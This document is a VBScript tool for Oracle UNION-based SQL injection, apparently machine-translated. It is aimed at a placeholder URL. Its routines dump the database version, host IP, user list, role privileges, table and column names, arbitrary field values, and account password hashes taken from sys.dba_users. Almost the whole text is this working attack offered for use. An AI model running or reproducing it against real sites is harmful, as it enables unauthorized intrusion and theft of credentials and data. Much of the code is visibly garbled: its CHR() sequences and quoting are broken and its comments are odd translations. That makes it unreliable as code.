‘***********************************************************************************************
' Oracle Union Injection Tool by lone water around the city
' Applies to the injection point where union can be used
‘***********************************************************************************************
' Modified TR4C3 's ql2005 injection-assisted script [rough version] of the framework
Const method = "Get" ' Submit method please modify here, there are get and post optional
Const DisPlay = "D" ' S saved to file, D output to screen
Dim Strurl_b, strURL, MyArray, Strarg, Strd,tmpstrarg,currcount,num
' Manually determine the number of fields, and then find a character format and replace it with a <**> in the page where it appears
Strurl_b = "Http://www.target.com/renews.jsp?id=348%20and%201=2%20union%20all%20select%20null,<**>,null, Null,null,null,null,null,null,null,null,null "' Based on the uncertainty of injection point, please change it manually here
Currcount =-1
MyArray = Split (Strurl_b, "?",-1, 1)
strURL = MyArray (0) ' Fetch URL
Strarg = MyArray (1) ' Take parameters
Set Args = wscript.arguments
If args.count = 0 Then
Showu ()
End If
‘************************************************************************
' Bomb Vault '
‘************************************************************************
If Args.count =1 Then
If LCase (Trim (Args (0))) = "Info" Then
Resut ("The Oracle version")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("banner"))
Call Sqlinj ("%20from%20v$version%20where%201=1%20--", "content")
Resut ("The Oracle IP")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Sys_context (Chr (117)%7C%7CCHR ()%7C%7CCHR (101)%7C%7CCHR (114)% 7C%7CCHR (101)%7C%7CCHR (+)%7C%7CCHR (118), Chr%7C%7CCHR ()%7C%7CCHR ()%7C%7CCHR ()%7C%7CCHR 7CCHR (%7C%7CCHR)%7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR (115)))
Call Sqlinj ("%20%20from%20dual%20where%201=1%20--", "content")
Resut ("the Database")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("name"))
Call Sqlinj ("%20from%20v$database%20where%20rownum=1%20--", "content")
Resut ("The Database User")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("user"))
Call Sqlinj ("%20%20from%20user_tables%20where%20rownum=1%20--", "content")
Resut ("The Database All Users")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20all_users%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("username"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,username%20from%20 (select%20rownum%20r,username%20from%20all_users% 20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"%20order%20by% 201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
Resut ("The user Privileges")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_role_privs%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Granted_role"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,granted_role%20from%20 (select%20rownum%20r,granted_role%20from% 20user_role_privs%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num & "%20order%20by%201) t%20where%201=1%20--", "content")
Next
Currcount =-1
Resut ("The Session_roles")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20session_roles%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("role"))
For Num=0 to Currcount
Call Sqlinj ("%20%20from%20 (select%20rownum%20r,role%20from%20 (select%20rownum%20r,role%20from%20session_roles% 20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"%20order%20by% 201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
Resut ("The Service_names")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("value"))
Call Sqlinj ("%20FROM%20V$PARAMETER%20WHERE%20NAME=CHR"%7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR) 118 ( %7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR)%7c%7cchr (%7C%7CCHR)%7C%7CCHR (109)%7C%7CCHR () 101 ( %20--"," content ")
Resut ("The Account Hash")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20sys.dba_users%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("a"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20" (select%20rownum%20r,a%20from%20 (SELECT%20ROWNUM%20R,USERNAME%7C%7CCHR)%7C%7Cpassword %7C%7CCHR (%7C%7CNAME%7C%7CCHR)%7C%7CUTL_INADDR.GET_HOST_NAME%7C%7CCHR (+)%20as%20a%20from%20sys.dba_ Users,sys.v_$database%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "& num& "%20order%20by%201) t%20where%201=1%20--", "content")
Next
Currcount =-1
Wscript.Quit
End If
End If
‘************************************************************************
' Exploded watch
‘************************************************************************
If args.count=2 and LCase (Trim (Args (1))) = "Tables" Then
Resut ("All the Tables")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_tables%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", PLASTR ("table_name"))
If Currcount >0 Then
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,table_name%20from%20 (select%20rownum%20r,table_name%20from%20user_ Tables%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"% 20order%20by%201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
End If
Wscript.Quit
End If
‘************************************************************************
' Explode field
‘************************************************************************
If args.count=3 and LCase (Trim (Args (2))) = "Cols" Then
Resut ("The Cols of" &args (1))
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_tab_columns%20where%20table_name=" &ENCODECHR (UCase (Trim (Args (1))) & "%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("column_name"))
If Currcount >0 Then
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,column_name%20from%20 (select%20rownum%20r,column_name%20from%20user _tab_columns%20where%20rownum%3c= "&num+1&"%20and%20table_name= "&ENCODECHR (UCase (Trim (Args (1))) & "%20order%20by%201%20desc"%20t%20where%20r%3e "&num&"%20order%20by%201) t%20where%201=1%20--"," Content ")
Next
Currcount =-1
End If
Wscript.Quit
End If
‘************************************************************************
' Burst field value
‘************************************************************************
If args.count=4 and LCase (Trim (Args (3)) = "Values" Then
Resut ("The Value of" &args (2))
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", "Count (*)")
Call Sqlinj ("%20from%20client%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", UCase (Trim (Args (2)))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r," &ucase (Trim (Args (2))) & "%20from%20 (select%20rownum%20r," &ucase (Trim (args (2))) & "%20from%20" &ucase (Trim (args (1)) & "%20where%20rownum%3c=" &num+1& "%20and%201=1%20order%20by%201%20desc)%20t%20where%20r%3e" &num& "%20order%20by%201) t%20where%201=1%20-- "," content ")
Next
Wscript.Quit
End If
Sub Sqlinj (Value,thetype)
If UCase (method) = "GET" Then
Value = tmpstrarg & Value
Dim Thestr
Thestr = strURL & "?" & Value
' Wsh.echo thestr
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "GET", strURL & "?" & Value, False
Objxml.setrequestheader "Referer", strURL
' Objxml.setrequestheader "Accept-language", "Euc-kr"
Objxml.send ()
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' Korean sometimes use this
If InStr (Strrevs, "^") <>0 and InStr (Strrevs, "~") <>0 Then
If Thetype = "Count" Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Currcount = CInt (StrD)
Resut ("|_the count number [" &strD&] ")
End if
If thetype = "Content" and Currcount <>-1 Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Resut ("|_|_" &STRD)
End If
If thetype = "Content" and Currcount =-1 Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Resut ("|_" &STRD)
End If
Else
StrD = ""
End If
ElseIf UCase (method) = "POST" Then
Value = tmpstrarg & Value
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "POST", strURL, False
Objxml.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Objxml.setrequestheader "Referer", strURL
Objxml.send (UrlEncode (value))
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' Korean sometimes use this
If InStr (Strrevs, "^") <>0 and InStr (Strrevs, "~") <>0 Then
If Thetype = "Count" Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Currcount = CInt (StrD)
Resut ("|_the count number" &STRD)
End if
If thetype = "Content" and Currcount <>-1 Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Resut ("|_|_" &STRD)
End If
If thetype = "Content" and Currcount =-1 Then
StrD = Mid (Strrevs,instr (Strrevs, "^^ ^") +3, InStr (Strrevs, "~ ~ ~")-InStr (Strrevs, "^^ ^")-3)
Resut ("|_" &STRD)
End If
Else
StrD = ""
End If
End If
End Sub
Function Resut (Strinfo)
If UCase (DisPlay) = "S" Then
Set fso = CreateObject ("Scripting.FileSystemObject")
Set FSO1 = fso. OpenTextFile ("Result.txt", 8,true)
Fso1. WriteLine (Strinfo)
Fso1. Close
Set FSO = Nothing
ElseIf UCase (DisPlay) = "D" Then
WScript.Echo (Strinfo)
End If
End Function
Function UrlEncode (str)
str = Replace (str, "", "+")
UrlEncode = str
End Function
Function Bytes2bstr (vIn)
Strreturn = ""
For i = 1 to LenB (vIn)
Thischarcode = AscB (MidB (vin,i,1))
If Thischarcode < &h80 Then
Strreturn = Strreturn & Chr (Thischarcode)
Else
Nextcharcode = AscB (MidB (vin,i+1,1))
Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))
i = i + 1
End If
Next
Bytes2bstr = Strreturn
End Function
Function ENCODECHR (str)
Dim I,retstr
Retstr = ""
For I=1 to Len (str)
RETSTR = retstr& "Chr (" &asc (Mid (str,i,1) & ")%7c%7c"
Next
ENCODECHR = Left (Retstr,len (RETSTR)-6)
End Function
Function plastr (str)
Dim Retstr
RETSTR = retstr& "Chr (94)%7C%7CCHR (94)%7C%7CCHR (94)%7c%7c" &str& "%7C%7CCHR (126)%7C%7CCHR (126)%7C%7CCHR (126) "
Plastr = Retstr
End function
Sub Showu ()
With Wscript
. Echo ("+--------------------------=====================------------------------------+")
. Echo ("Oracle Union Injection Tool by lone water around the city")
. Echo ("Usage:")
. Echo ("cscript" &. scriptname& "info--explosion basic Information")
. Echo ("cscript" &. scriptname& "Pubs tables--all user table names in pubs")
. Echo ("cscript" &. scriptname& "Pubs authors cols--all field names for authors tables in pubs")
. Echo ("cscript" &. scriptname& "Pubs authors au_id values--burst pubs.dbo.authors value")
. Echo ("+--------------------------=====================------------------------------+")
. Quit
End with
End Sub
Oracle Union Injection Tool